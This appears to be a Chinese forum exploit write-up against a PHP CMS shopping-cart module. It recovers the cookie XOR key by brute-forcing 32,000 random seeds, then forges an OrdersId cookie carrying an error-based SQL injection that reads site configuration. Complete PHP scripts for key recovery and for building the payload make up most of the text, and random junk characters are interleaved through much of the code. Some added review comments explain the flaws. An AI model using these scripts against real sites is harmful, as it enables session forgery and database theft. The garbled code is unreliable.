www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Stores $value in a cookie named $key for 10 hours (36000 s), scoped to '/'.
 *
 * Array values are first flattened by enCode() (a=yy&b=cc form, per the
 * surrounding write-up) and every value is then passed through enCrypt().
 *
 * NOTE(review): enCrypt() is obfuscation (repeating-key XOR), not
 * authenticated encryption — nothing here lets the server tell a cookie it
 * issued from one a client assembled itself. Add an HMAC over the payload
 * (hash_hmac) and verify it with hash_equals() before the value is trusted.
 * setcookie() is also called without the secure/httponly flags.
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    setcookie($key,$value,time()+36000,'/');
}
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的形式，关键是 enCrypt 函数。
7 n" G* J* P ^% R8 l. }186 function enCrypt($txt)( c' w2 n$ T9 y' }! c% J7 S9 m1 }
187 {
( p9 d. I; f: H+ |: c3 ]188 srand((double)microtime() * 1000000);! N4 f$ w. X) v9 w3 q
189 $encrypt_key = md5(rand(0, 32000));( V) X' V4 ]+ N: \
190 $ctr = 0;
* v; r( @( |/ [1 @, k0 y) ]$ i( ^' P191 $tmp = ”;
/ ]( z7 A; A9 D% f192 for($i = 0; $i < strlen($txt); $i++)% r, S1 U4 z- y" {' q, ~
193 {
0 X+ } m' _* E6 o. J- m. r0 Y# Y194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, Q; U8 u/ a$ }- a3 C195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. \: J. C" F# U) p5 b9 a196 }: X& f! S# A. b4 e, o& ] g9 V# f
197 return base64_encode($this->setKey($tmp));
. [0 p3 n% [& E, d" x/ [198 } X$ F) S* R" M" m0 g; \; d
/**
 * XORs $txt byte-by-byte with the site-wide key
 * md5(strtolower($cfg_cookie_encode)), repeating the 32-character key as
 * needed. XOR is its own inverse, so applying this twice restores the
 * input; presumably the decoder reuses it (decoder not shown here).
 *
 * NOTE(review): a repeating-key XOR is not a cipher — a single known
 * plaintext/output pair of 32+ bytes reveals the whole key — and the derived
 * key is always lowercase hex, i.e. 16 possible values per position.
 * Rotating $cfg_cookie_encode after a compromise is necessary but not
 * sufficient; the construction should be replaced by an authenticated
 * scheme (e.g. sodium_crypto_secretbox or AES-GCM via openssl_encrypt).
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once all 32 key characters have been used
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下：
<?php
& N. s% K2 Z. l$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here- H" v( N$ s. L; G; B4 m# ]
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here2 n+ I$ }6 n. ~: D
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
' X4 F$ p* \+ Gfunction reStrCode($code,$string)' a& ]3 k& [3 D# Z# Y% o0 E. x
{
3 B& |& f3 e. X- X7 z$code = base64_decode($code);1 h& {% D3 n$ q, w
$key = “”;
b, r3 Q# O2 c$ j: O1 ?3 efor($i=0 ; $i<32 ; $i++)- ], l' V) R8 A. C5 \
{- x8 |) s' B: q1 F
$key .= $string[$i] ^ $code[$i];
! k, ~1 _2 p8 ^# S; S}& V4 m+ d7 u% F. p$ D" s) x
return $key;
) H) M! c! g7 J; M8 Q7 {& \}6 s$ p( r$ J0 u) H
function getKeys($cookie,$plantxt)7 p$ p1 k9 c8 {' F
{
5 K& S3 R0 S. {3 z$tmp = $cookie;) ~0 |3 s0 M5 m' \% O7 _5 j) p
$results = array();- P9 P- Y9 n4 m$ f6 L- z
for($j=0 ; $j < 32000; $j++)- d: P4 C+ O4 {% l. i
{
8 y. x" z) e% h2 v U( ?8 [" p2 J! v5 U/ `6 ~% ?; U$ {
$txt = $plantxt;
0 Z/ b" p. ^. l2 |' B: g$ctr = 0;
0 k/ M' i" ~0 U8 X$ v8 p$tmp = ”;
7 `7 ]; y _0 U; p6 J& Q$encrypt_key = md5($j);! N7 @1 C. U% p5 j, \
for($i =0; $i < strlen($txt); $i ++)5 ~/ l) ]) E6 t6 W' ?4 g1 |- Z
{2 S: Q1 a8 r' P: B! S+ m
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% i: A9 G$ G6 P0 j, I3 q4 _) q8 `$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
! J% P; d. _9 @ F}1 x* r P2 j4 y9 R, k3 x& V0 ~
$string = $tmp;
4 @( a' \6 K2 N, ?8 k# \3 f$code = $cookie;
' ?% F, K7 _( N" C4 a1 l. i, h3 K$result = reStrCode($code,$string);/ U: S5 y& N+ {- K, }1 n, M8 ~
if(eregi(‘^[a-z0-9]+$’,$result))
5 P" b3 n! w2 D( Q' Q{, O, o$ U( p% R5 m) E
echo $result.”\n”;
6 K% X/ U5 o- t5 l" N% p$ ?# t/ M6 ^$results[] = $result;7 Q# X. ]- s H1 @: E+ i
}
$ g8 G) ? N# Q3 m}7 D1 s, |* k; l$ N9 W- {) R
return $results;' j8 b0 \6 {1 Z2 L% e
}6 H6 } C; s/ i
$results1 = getKeys($cookie1,$plantxt); b" {9 R! R( f1 j2 B0 {
$results2 = getKeys($cookie2,$plantxt);
- M$ j7 o3 I0 I8 Q6 f/ @! tprint “\n——————–real key————————–\n”;% {% J! C+ Z, w$ c
foreach($results1 as $test1)
( J8 i2 R9 `1 N% F2 V% {{+ N! h( R) C, V: o
foreach($results2 as $test2)
% V; N% b. E. H+ w{
6 H7 x4 {7 n3 kif($test1 == $test2)
+ f j5 Y' k, d* @7 w{! M+ T- b4 G! j) a7 K3 E, k) U
echo $test1.”\n”;% p! I4 n0 [0 y! V* B+ x4 I- |5 _
}7 e, o8 R; R+ U5 s3 w( U3 S9 |
}
1 S+ x7 p/ W" E2 W( y5 U$ R}
+ a0 \" s& [7 W/ q2 U?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看" W3 n+ ?7 ?% _' h7 F5 Z5 T4 L
20 class MemberShops$ q. V, c. r) h
21 {. u+ M( e5 }- ` m
22 var $OrdersId;* ]% Q! [8 U7 n( O2 Z) g9 d; B
23 var $productsId;
" i8 s+ K7 R o24- b5 t9 R9 `+ v, b: p7 o
/**
 * Loads the current order id from the "OrdersId" cookie, creating a fresh
 * order via MakeOrders() when the cookie is absent or empty.
 *
 * NOTE(review): the cookie value is trusted as-is. getCookie() is not shown
 * here, and nothing in this constructor checks that OrdersId has the shape
 * MakeOrders() produces; in /plus/carbuyaction.php (line 173 of the excerpt
 * below) it is interpolated into a SQL string. Validate the id against its
 * expected format here and use a placeholder-based query at the call site.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的
然后
" \# l9 b. \# \# O( F/plus/carbuyaction.php中的
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id for this request — comes straight from the client's cookie (see MemberShops::__construct)
// … (intervening lines omitted in the excerpt)
// NOTE(review): $OrdersId is client-controlled and is concatenated into the statement without
// escaping or a placeholder, so the value can alter the query. Bind it as a parameter (or at
// minimum run it through the driver's escaping and validate its format before this point).
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
4 D: g) ^+ R: E# k7 O接着我们就可以注入了+ H* M* ^9 D" F, i
通过利用下面代码生成cookie:
5 R2 |# L/ o i! c H<?php7 ?' m4 X6 L' I- o# c
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
8 {, j. q9 j9 |2 X% W' e% T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here& Z& r5 \7 r7 V* c q6 E
function setKey($txt)
: G) A1 I% S1 E$ h{
- ~) j5 F7 {8 s. D- l1 H( N3 y" xglobal $encrypt_key;6 p( z$ U2 b2 S& D4 u* L9 L3 b S9 m+ z
$ctr = 0;: H0 u% F6 L* P8 Z! s
$tmp = ”;/ ? R+ C! s8 l1 [
for($i = 0; $i < strlen($txt); $i++)6 k1 B1 s& Z: J, k
{
3 Y. c+ K" W( G5 L: \: T7 x0 D$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% v' U% Y; I& l1 _) H4 h
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
/ O; J3 L) l% g& K( T1 \}
' w5 P2 Q6 r0 ]: sreturn $tmp;
+ W& S1 X6 {7 o L" u}% t1 o- \$ O3 a, B" u( `' h: g
function enCrypt($txt)
& o! X, `4 L6 i4 D/ F( Y0 W{) g9 r; z% Z1 k) q
srand((double)microtime() * 1000000);1 F7 z1 F9 k8 p" b6 S
$encrypt_key = md5(rand(0, 32000));. ^# F/ W- C8 t1 D7 ~, J( r
$ctr = 0;
& Z) I5 ~: \# `! T$ K9 |7 F X$tmp = ”;
" } X0 W: c! N# M+ Mfor($i = 0; $i < strlen($txt); $i++) O* V: a6 ?0 k7 i, @
{
! p4 g! `1 t/ _- z! H, n! o: g$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, A: t9 T5 B u V9 T
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 I/ Q" w) r0 C. [}
* r( O! D. W& J& a& `% f' K$ b% oreturn base64_encode(setKey($tmp));% a+ P' U% q# B# f; y, x
}, t( s) g5 _* l( W; V5 U& F# \
for($dest =0;$dest = enCrypt($txt);)
( V1 |3 l6 {0 y9 x& c{
) L# j: Y& C5 r& J: u, x7 _if(!strpos($dest,’+'))
, I# H( j" y3 L" f5 c# g{7 k7 Q ~6 x0 H9 H! d0 m, k
break;& [4 b. L' p( O' U7 V! L
}
4 l# k' P: w0 E7 u- l}+ X) {% W( w" F: H5 m' g6 b9 h8 L& D
echo $dest.”\n”;3 Y, N* D. V! C2 r6 E& p
?>! r% A* V( K" `$ f